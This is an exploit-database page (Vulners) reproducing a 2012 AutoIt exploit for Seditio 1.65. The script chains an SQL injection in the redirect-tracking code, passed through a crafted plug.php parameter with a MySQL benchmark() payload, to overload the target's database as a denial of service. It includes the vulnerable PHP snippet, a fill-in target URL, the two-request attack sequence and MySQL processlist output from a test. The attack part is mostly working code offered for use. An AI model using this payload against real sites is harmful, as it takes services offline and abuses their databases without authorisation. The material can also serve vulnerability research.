Vulners
Lucene search
Seditio 165 SQL Injection / Denial Of Service
`#cs
Seditio 165 (from seditio-eklenti.com)
Denial Of Service exploit by AkaStep.
We will exploit Sql injection using this exploit and as result we will cause Denial of Service.
Mysql server will go down or will overloaded +server will get overloaded(High CPU Load).
// Vuln Discovered By AkaStep + exploit By AkaStep.
Enjoyyyyy)
NOTES Do not login to target site otherwise it will fail to exploit vuln.
Exploit Coded in Autoit.See autoitscript.com
Details about Vuln:(Magic_Quotes_gpc=off)
//seditio165 from seditio-eklenti.com
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep
//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{
$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}
/14 April 2012
#ce
$targetsite="http://targetsite.tld/"; //target site. Change it to target site.
#cs
DO NOT TOUCH ANYTHING BELOW
#ce
$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.
HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit
#cs
Here is how this process looks like from server's mysql:
worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case.
mysql> show full processlist \G
*************************** 4. row ***************************
Id: 5
User: sed165
Host: worker.com:1632
db: sed165
Command: Query
Time: 411
State: Updating
Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))
),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1'
*************************** 5. row ***************************
Id: 6
User: root
Host: localhost:2658
db: sed165
Command: Query
Time: 0
State: NULL
Info: show full processlist
*************************** 6. row ***************************
Id: 7
User: sed165
Host: worker.com:1633
db: sed165
Command: Query
Time: 69
State: Waiting for table level lock
Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1'
6 rows in set (0.00 sec)
mysql>
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
#ce
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2012 00:00Current
0.8Low risk
Vulners AI Score0.8